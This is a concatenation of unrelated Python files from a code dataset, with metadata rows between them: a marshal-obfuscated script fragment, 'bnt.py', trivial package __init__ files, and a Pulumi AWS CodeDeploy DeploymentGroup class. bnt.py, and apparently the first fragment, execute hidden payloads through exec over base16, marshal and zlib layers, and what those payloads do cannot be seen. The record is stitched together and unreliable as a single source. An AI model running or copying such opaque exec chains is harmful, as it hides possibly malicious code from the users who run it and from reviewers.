x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01'))
except:
os.system('dialog --title "PERINGATAN" --msgbox " TERDAPAT KESALAHAN TEKNISI" 10 45')
| 13,695.3 | 136,388 | 0.753908 | 30,702 | 136,953 | 3.362419 | 0.024689 | 0.579873 | 0.552992 | 0.526576 | 0.938944 | 0.938944 | 0.93877 | 0.93877 | 0.938508 | 0.938508 | 0 | 0.402408 | 0.00176 | 136,953 | 9 | 136,389 | 15,217 | 0.352705 | 0.003111 | 0 | 0 | 0 | 1.6 | 0.240653 | 0.23987 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 16 |
d225ef214f3d398f4a6d3f2ce2c153c03f7ff0a0 | 4,315 | py | Python | bnt.py | sillytuktuk2020/bnt | 2d60095a6525f8690f0944f6a04866c60cf1a320 | [
"Apache-2.0"
] | null | null | null | bnt.py | sillytuktuk2020/bnt | 2d60095a6525f8690f0944f6a04866c60cf1a320 | [
"Apache-2.0"
] | null | null | null | bnt.py | sillytuktuk2020/bnt | 2d60095a6525f8690f0944f6a04866c60cf1a320 | [
"Apache-2.0"
] | null | null | null | # Auther : AKSHAY DHAWAN
# GitHub : https://github.com/sillytuktuk2020
# Instagram : decent_deep_raadhe
import base64
exec(base64.b16decode('2320436F6D70696C6564204279203A2042696E79616D696E0A2320476974487562203A2068747470733A2F2F6769746875622E636F6D2F42696E79616D696E2D62696E6E690A2320596F7554756265204368616E6E656C203A20547269636B2050726F6F660A696D706F7274206D61727368616C0A65786563286D61727368616C2E6C6F6164732827635C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830335C7830305C7830305C783030405C7830305C7830305C78303073215C7830305C7830305C783030645C7830305C783030645C7830315C7830306C5C7830305C7830305A5C7830305C783030655C7830305C7830306A5C7830315C783030645C7830325C7830305C7838335C7830315C783030645C7830315C7830305C78303455645C7830315C78303053285C7830335C7830305C7830305C783030695C7866665C7866665C7866665C7866664E735C7830665C7830325C7830305C783030785C7839635C786264544D5C7838665C786461305C7831303D5C7864375C786266625C7865615C7831655C7830322A49285C78626444485C7831635C7864382E5C7864615C7831655C7864385C7831325C7830315C786162554F5B5C27385C7863316A62475C7866655C7831305C7863625C7862665C7861665C78663349525C786138565C7865645C7861315C786566627B5C7864655C7866335C7863635C78623333315C7863625C78306221355C783038355167355C7864312C5C78613748285C7863665C786365355C78636447385C786365285C783931785C7838635C7864305C7838375C7831325C7862305C7864653C6C5C7861305C7839615C7861324C5C786134625C786531385C7830655C6E5C783161445C7830345C7830305C7865635C7830385C7831355C786361315C7865385C7830315C7862355C7830345C7830655C7861325C7839615C786539645C7863645C786134534C5C7838325C786230225C7865615C786635505C786631525C7863325C72425C7861375C786164705C786135702B5C7830345C7864315C7861345C7863375C7864655C7861615C7866325C7861335C7866365C7864315C7839345C7862385C786135205C7838645C7838663A3C545C7864345C783038715C7861665C786663405C7838315C7864635C7862665C783036425C786230345C786661485C7861355C786364305C7838373B5C7863365C78636624675C7831635C7863315C7830335C7864335F4D545C7830355C7838665A5C7831376A5C7865655C786662295C786433475C783133795C7862315C7863385C7866645C7861385C7864315C786239765C7863325C7831395C7838325C7865665C7863325C7865634D444B5C7866355E5C7862325C7866385C275C783834525C7838385C7830345C7863315C7839645C7866645E5C7861615C7831305C7862615C783937455C7839377C515C7864325E5C7864345C786230655C7863615C7837665C7866325C7830656F5C7861306C5C7831345C786634454849635C7866645C7861345C7861385C786534245C7861375C7862305C7830305C7864635C7864615C7863372D5C7831395C7831325C7861354E425C7831652A5C7839326B5C7838636C5C7861335C7838395C7863325C7861655C7831632D5C72755C7864305C7865395C786338325C6E5C7861333A5C786438465C7863375C7866335C78636140215C7831395C7864375036665C786235345C7839373A5C7839325C7839635E5C7831382F5C7838635C783165615C7864386F366B785C7864615C7861645C7862365C7864665C7839365C7838665C786162395C7864385C7865362E5C7863352C5C7838315C786431655C7863335C7830327E5C7866335C7864615478575C5C5C7865635D5C7865355C7830635C7839375C7862625C7864645C786633667B5C7864665C7865356C5C7866335E3675795C7864626336795B5C7864345C275C7863305C7862305C783136694A5C7830665C78633038285C7831335C786337545C7861395C786334645C7864395C7831395C7838385C7862325C7864635C7863375C786565605C7838335C7861645C7865355C7839665C7865625C7861395C7838635C786432625C786634693C605C7864615C7830624C485C7861365C7865635C725C786236616A575C7862375C7861623F4B5C786331535C7865385C7862655C7863347B3C505D5E5C7830375C7865375C7866355C7839305C7862615C7861325C7861305C7866635C7861645C7839365C786632675C7864335C7864395C7864345C7839667E5C786636355C7839355C7862397975355C783931295C7864355C78616565725C7863325C7830666E225C7861345C783962445C7865655C786339765C786235305C7864613B5C7865613C735C7863365C7837665C7861385C7864395C786264485C786437475C7831385C7864615C7865665C7862615C786163675C7866665C7837665B5C7862665C7866355C7839305C786636625C7863355C7864395C7865655C786532335C7866305C7862365C7861625C7865355C7866645C7865335C7863615C7863625C783066785C7866635C7830625C786535677A5C783065285C7830325C7830305C7830305C783030745C7830345C7830305C7830305C7830307A6C6962745C6E5C7830305C7830305C7830306465636F6D7072657373285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030735C7830345C7830305C7830305C7830305C7831625B306D745C7830385C7830305C7830305C7830303C6D6F64756C653E5C7830345C7830305C7830305C783030735C7830325C7830305C7830305C7830305C7830635C783031272929')) | 863 | 4,196 | 0.992121 | 18 | 4,315 | 237.722222 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.842987 | 0.003708 | 4,315 | 5 | 4,196 | 863 | 0.152361 | 0.022711 | 0 | 0 | 0 | 0 | 0.989559 | 0.989559 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 12 |
9645047fc6b87f0e0428edc04ac96fe6d667b987 | 177 | py | Python | icedata/datasets/pets/__init__.py | ganesh3/icedata | 16c26ea3d8f96b99357683849d6bd363bf12a827 | [
"Apache-2.0"
] | 42 | 2020-09-14T18:28:02.000Z | 2022-03-30T19:55:10.000Z | icedata/datasets/pets/__init__.py | ganesh3/icedata | 16c26ea3d8f96b99357683849d6bd363bf12a827 | [
"Apache-2.0"
] | 103 | 2020-09-11T19:50:29.000Z | 2022-03-15T13:07:10.000Z | icedata/datasets/pets/__init__.py | ganesh3/icedata | 16c26ea3d8f96b99357683849d6bd363bf12a827 | [
"Apache-2.0"
] | 19 | 2020-09-11T19:26:50.000Z | 2022-03-15T13:09:44.000Z | from icedata.datasets.pets.data import *
from icedata.datasets.pets.parser import *
from icedata.datasets.pets.dataset import *
from icedata.datasets.pets import trained_models
| 35.4 | 48 | 0.830508 | 25 | 177 | 5.84 | 0.4 | 0.30137 | 0.520548 | 0.630137 | 0.59589 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090395 | 177 | 4 | 49 | 44.25 | 0.906832 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
73959563d2665ea51a6b4130eb9d50119669095b | 136 | py | Python | openapi_data_generator/utils/__init__.py | elyashiv3839/openapi-data-generator | 0dc4828eb84c79dcb7b00b140bb2145cf05ba967 | [
"MIT"
] | null | null | null | openapi_data_generator/utils/__init__.py | elyashiv3839/openapi-data-generator | 0dc4828eb84c79dcb7b00b140bb2145cf05ba967 | [
"MIT"
] | null | null | null | openapi_data_generator/utils/__init__.py | elyashiv3839/openapi-data-generator | 0dc4828eb84c79dcb7b00b140bb2145cf05ba967 | [
"MIT"
] | null | null | null | from .src.KeysHandler import *
from .src.ObjectsHandler import *
from .src.SchemaHandler import *
from .src.LockDir import LockDirectory | 34 | 38 | 0.808824 | 17 | 136 | 6.470588 | 0.470588 | 0.254545 | 0.354545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110294 | 136 | 4 | 38 | 34 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
fbb7c9aefcca231e126cbfaf31ee0ab02910194d | 35,795 | py | Python | sdk/python/pulumi_aws/codedeploy/deployment_group.py | texdc/pulumi-aws | 93a7a28ab7db6b1cd7e6686c0b68aa4c89490d4f | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/codedeploy/deployment_group.py | texdc/pulumi-aws | 93a7a28ab7db6b1cd7e6686c0b68aa4c89490d4f | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/codedeploy/deployment_group.py | texdc/pulumi-aws | 93a7a28ab7db6b1cd7e6686c0b68aa4c89490d4f | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class DeploymentGroup(pulumi.CustomResource):
alarm_configuration: pulumi.Output[dict]
"""
Configuration block of alarms associated with the deployment group (documented below).
* `alarms` (`list`) - A list of alarms configured for the deployment group. _A maximum of 10 alarms can be added to a deployment group_.
* `enabled` (`bool`) - Indicates whether a defined automatic rollback configuration is currently enabled for this Deployment Group. If you enable automatic rollback, you must specify at least one event type.
* `ignorePollAlarmFailure` (`bool`) - Indicates whether a deployment should continue if information about the current state of alarms cannot be retrieved from CloudWatch. The default value is `false`.
* `true`: The deployment will proceed even if alarm status information can't be retrieved.
* `false`: The deployment will stop if alarm status information can't be retrieved.
"""
app_name: pulumi.Output[str]
"""
The name of the application.
"""
auto_rollback_configuration: pulumi.Output[dict]
"""
Configuration block of the automatic rollback configuration associated with the deployment group (documented below).
* `enabled` (`bool`) - Indicates whether a defined automatic rollback configuration is currently enabled for this Deployment Group. If you enable automatic rollback, you must specify at least one event type.
* `events` (`list`) - The event type or types that trigger a rollback. Supported types are `DEPLOYMENT_FAILURE` and `DEPLOYMENT_STOP_ON_ALARM`.
"""
autoscaling_groups: pulumi.Output[list]
"""
Autoscaling groups associated with the deployment group.
"""
blue_green_deployment_config: pulumi.Output[dict]
"""
Configuration block of the blue/green deployment options for a deployment group (documented below).
* `deploymentReadyOption` (`dict`) - Information about the action to take when newly provisioned instances are ready to receive traffic in a blue/green deployment (documented below).
* `actionOnTimeout` (`str`) - When to reroute traffic from an original environment to a replacement environment in a blue/green deployment.
* `CONTINUE_DEPLOYMENT`: Register new instances with the load balancer immediately after the new application revision is installed on the instances in the replacement environment.
* `STOP_DEPLOYMENT`: Do not register new instances with load balancer unless traffic is rerouted manually. If traffic is not rerouted manually before the end of the specified wait period, the deployment status is changed to Stopped.
* `waitTimeInMinutes` (`float`) - The number of minutes to wait before the status of a blue/green deployment changed to Stopped if rerouting is not started manually. Applies only to the `STOP_DEPLOYMENT` option for `action_on_timeout`.
* `greenFleetProvisioningOption` (`dict`) - Information about how instances are provisioned for a replacement environment in a blue/green deployment (documented below).
* `action` (`str`) - The action to take on instances in the original environment after a successful blue/green deployment.
* `TERMINATE`: Instances are terminated after a specified wait time.
* `KEEP_ALIVE`: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
* `terminateBlueInstancesOnDeploymentSuccess` (`dict`) - Information about whether to terminate instances in the original fleet during a blue/green deployment (documented below).
* `action` (`str`) - The action to take on instances in the original environment after a successful blue/green deployment.
* `TERMINATE`: Instances are terminated after a specified wait time.
* `KEEP_ALIVE`: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
* `terminationWaitTimeInMinutes` (`float`) - The number of minutes to wait after a successful blue/green deployment before terminating instances from the original environment.
"""
deployment_config_name: pulumi.Output[str]
"""
The name of the group's deployment config. The default is "CodeDeployDefault.OneAtATime".
"""
deployment_group_name: pulumi.Output[str]
"""
The name of the deployment group.
"""
deployment_style: pulumi.Output[dict]
"""
Configuration block of the type of deployment, either in-place or blue/green, you want to run and whether to route deployment traffic behind a load balancer (documented below).
* `deploymentOption` (`str`) - Indicates whether to route deployment traffic behind a load balancer. Valid Values are `WITH_TRAFFIC_CONTROL` or `WITHOUT_TRAFFIC_CONTROL`.
* `deploymentType` (`str`) - Indicates whether to run an in-place deployment or a blue/green deployment. Valid Values are `IN_PLACE` or `BLUE_GREEN`.
"""
ec2_tag_filters: pulumi.Output[list]
"""
Tag filters associated with the deployment group. See the AWS docs for details.
* `key` (`str`) - The key of the tag filter.
* `type` (`str`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`str`) - The value of the tag filter.
"""
ec2_tag_sets: pulumi.Output[list]
"""
Configuration block(s) of Tag filters associated with the deployment group, which are also referred to as tag groups (documented below). See the AWS docs for details.
* `ec2_tag_filters` (`list`) - Tag filters associated with the deployment group. See the AWS docs for details.
* `key` (`str`) - The key of the tag filter.
* `type` (`str`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`str`) - The value of the tag filter.
"""
ecs_service: pulumi.Output[dict]
"""
Configuration block(s) of the ECS services for a deployment group (documented below).
* `clusterName` (`str`) - The name of the ECS cluster.
* `serviceName` (`str`) - The name of the ECS service.
"""
load_balancer_info: pulumi.Output[dict]
"""
Single configuration block of the load balancer to use in a blue/green deployment (documented below).
* `elbInfos` (`list`) - The Classic Elastic Load Balancer to use in a deployment. Conflicts with `target_group_info` and `target_group_pair_info`.
* `name` (`str`) - Name of the target group.
* `targetGroupInfos` (`list`) - The (Application/Network Load Balancer) target group to use in a deployment. Conflicts with `elb_info` and `target_group_pair_info`.
* `name` (`str`) - Name of the target group.
* `targetGroupPairInfo` (`dict`) - The (Application/Network Load Balancer) target group pair to use in a deployment. Conflicts with `elb_info` and `target_group_info`.
* `prodTrafficRoute` (`dict`) - Configuration block for the production traffic route (documented below).
* `listenerArns` (`list`) - List of Amazon Resource Names (ARNs) of the load balancer listeners.
* `targetGroups` (`list`) - Configuration blocks for a target group within a target group pair (documented below).
* `name` (`str`) - Name of the target group.
* `testTrafficRoute` (`dict`) - Configuration block for the test traffic route (documented below).
* `listenerArns` (`list`) - List of Amazon Resource Names (ARNs) of the load balancer listeners.
"""
on_premises_instance_tag_filters: pulumi.Output[list]
"""
On premise tag filters associated with the group. See the AWS docs for details.
* `key` (`str`) - The key of the tag filter.
* `type` (`str`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`str`) - The value of the tag filter.
"""
service_role_arn: pulumi.Output[str]
"""
The service role ARN that allows deployments.
"""
trigger_configurations: pulumi.Output[list]
"""
Configuration block(s) of the triggers for the deployment group (documented below).
* `triggerEvents` (`list`) - The event type or types for which notifications are triggered. Some values that are supported: `DeploymentStart`, `DeploymentSuccess`, `DeploymentFailure`, `DeploymentStop`, `DeploymentRollback`, `InstanceStart`, `InstanceSuccess`, `InstanceFailure`. See [the CodeDeploy documentation][1] for all possible values.
* `triggerName` (`str`) - The name of the notification trigger.
* `triggerTargetArn` (`str`) - The ARN of the SNS topic through which notifications are sent.
"""
def __init__(__self__, resource_name, opts=None, alarm_configuration=None, app_name=None, auto_rollback_configuration=None, autoscaling_groups=None, blue_green_deployment_config=None, deployment_config_name=None, deployment_group_name=None, deployment_style=None, ec2_tag_filters=None, ec2_tag_sets=None, ecs_service=None, load_balancer_info=None, on_premises_instance_tag_filters=None, service_role_arn=None, trigger_configurations=None, __props__=None, __name__=None, __opts__=None):
"""
Provides a CodeDeploy Deployment Group for a CodeDeploy Application
> **NOTE on blue/green deployments:** When using `green_fleet_provisioning_option` with the `COPY_AUTO_SCALING_GROUP` action, CodeDeploy will create a new ASG with a different name. This ASG is _not_ managed by this provider and will conflict with existing configuration and state. You may want to use a different approach to managing deployments that involve multiple ASG, such as `DISCOVER_EXISTING` with separate blue and green ASG.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[dict] alarm_configuration: Configuration block of alarms associated with the deployment group (documented below).
:param pulumi.Input[str] app_name: The name of the application.
:param pulumi.Input[dict] auto_rollback_configuration: Configuration block of the automatic rollback configuration associated with the deployment group (documented below).
:param pulumi.Input[list] autoscaling_groups: Autoscaling groups associated with the deployment group.
:param pulumi.Input[dict] blue_green_deployment_config: Configuration block of the blue/green deployment options for a deployment group (documented below).
:param pulumi.Input[str] deployment_config_name: The name of the group's deployment config. The default is "CodeDeployDefault.OneAtATime".
:param pulumi.Input[str] deployment_group_name: The name of the deployment group.
:param pulumi.Input[dict] deployment_style: Configuration block of the type of deployment, either in-place or blue/green, you want to run and whether to route deployment traffic behind a load balancer (documented below).
:param pulumi.Input[list] ec2_tag_filters: Tag filters associated with the deployment group. See the AWS docs for details.
:param pulumi.Input[list] ec2_tag_sets: Configuration block(s) of Tag filters associated with the deployment group, which are also referred to as tag groups (documented below). See the AWS docs for details.
:param pulumi.Input[dict] ecs_service: Configuration block(s) of the ECS services for a deployment group (documented below).
:param pulumi.Input[dict] load_balancer_info: Single configuration block of the load balancer to use in a blue/green deployment (documented below).
:param pulumi.Input[list] on_premises_instance_tag_filters: On premise tag filters associated with the group. See the AWS docs for details.
:param pulumi.Input[str] service_role_arn: The service role ARN that allows deployments.
:param pulumi.Input[list] trigger_configurations: Configuration block(s) of the triggers for the deployment group (documented below).
The **alarm_configuration** object supports the following:
* `alarms` (`pulumi.Input[list]`) - A list of alarms configured for the deployment group. _A maximum of 10 alarms can be added to a deployment group_.
* `enabled` (`pulumi.Input[bool]`) - Indicates whether a defined automatic rollback configuration is currently enabled for this Deployment Group. If you enable automatic rollback, you must specify at least one event type.
* `ignorePollAlarmFailure` (`pulumi.Input[bool]`) - Indicates whether a deployment should continue if information about the current state of alarms cannot be retrieved from CloudWatch. The default value is `false`.
* `true`: The deployment will proceed even if alarm status information can't be retrieved.
* `false`: The deployment will stop if alarm status information can't be retrieved.
The **auto_rollback_configuration** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Indicates whether a defined automatic rollback configuration is currently enabled for this Deployment Group. If you enable automatic rollback, you must specify at least one event type.
* `events` (`pulumi.Input[list]`) - The event type or types that trigger a rollback. Supported types are `DEPLOYMENT_FAILURE` and `DEPLOYMENT_STOP_ON_ALARM`.
The **blue_green_deployment_config** object supports the following:
* `deploymentReadyOption` (`pulumi.Input[dict]`) - Information about the action to take when newly provisioned instances are ready to receive traffic in a blue/green deployment (documented below).
* `actionOnTimeout` (`pulumi.Input[str]`) - When to reroute traffic from an original environment to a replacement environment in a blue/green deployment.
* `CONTINUE_DEPLOYMENT`: Register new instances with the load balancer immediately after the new application revision is installed on the instances in the replacement environment.
* `STOP_DEPLOYMENT`: Do not register new instances with load balancer unless traffic is rerouted manually. If traffic is not rerouted manually before the end of the specified wait period, the deployment status is changed to Stopped.
* `waitTimeInMinutes` (`pulumi.Input[float]`) - The number of minutes to wait before the status of a blue/green deployment changed to Stopped if rerouting is not started manually. Applies only to the `STOP_DEPLOYMENT` option for `action_on_timeout`.
* `greenFleetProvisioningOption` (`pulumi.Input[dict]`) - Information about how instances are provisioned for a replacement environment in a blue/green deployment (documented below).
* `action` (`pulumi.Input[str]`) - The action to take on instances in the original environment after a successful blue/green deployment.
* `TERMINATE`: Instances are terminated after a specified wait time.
* `KEEP_ALIVE`: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
* `terminateBlueInstancesOnDeploymentSuccess` (`pulumi.Input[dict]`) - Information about whether to terminate instances in the original fleet during a blue/green deployment (documented below).
* `action` (`pulumi.Input[str]`) - The action to take on instances in the original environment after a successful blue/green deployment.
* `TERMINATE`: Instances are terminated after a specified wait time.
* `KEEP_ALIVE`: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
* `terminationWaitTimeInMinutes` (`pulumi.Input[float]`) - The number of minutes to wait after a successful blue/green deployment before terminating instances from the original environment.
The **deployment_style** object supports the following:
* `deploymentOption` (`pulumi.Input[str]`) - Indicates whether to route deployment traffic behind a load balancer. Valid Values are `WITH_TRAFFIC_CONTROL` or `WITHOUT_TRAFFIC_CONTROL`.
* `deploymentType` (`pulumi.Input[str]`) - Indicates whether to run an in-place deployment or a blue/green deployment. Valid Values are `IN_PLACE` or `BLUE_GREEN`.
The **ec2_tag_filters** object supports the following:
* `key` (`pulumi.Input[str]`) - The key of the tag filter.
* `type` (`pulumi.Input[str]`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`pulumi.Input[str]`) - The value of the tag filter.
The **ec2_tag_sets** object supports the following:
* `ec2_tag_filters` (`pulumi.Input[list]`) - Tag filters associated with the deployment group. See the AWS docs for details.
* `key` (`pulumi.Input[str]`) - The key of the tag filter.
* `type` (`pulumi.Input[str]`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`pulumi.Input[str]`) - The value of the tag filter.
The **ecs_service** object supports the following:
* `clusterName` (`pulumi.Input[str]`) - The name of the ECS cluster.
* `serviceName` (`pulumi.Input[str]`) - The name of the ECS service.
The **load_balancer_info** object supports the following:
* `elbInfos` (`pulumi.Input[list]`) - The Classic Elastic Load Balancer to use in a deployment. Conflicts with `target_group_info` and `target_group_pair_info`.
* `name` (`pulumi.Input[str]`) - Name of the target group.
* `targetGroupInfos` (`pulumi.Input[list]`) - The (Application/Network Load Balancer) target group to use in a deployment. Conflicts with `elb_info` and `target_group_pair_info`.
* `name` (`pulumi.Input[str]`) - Name of the target group.
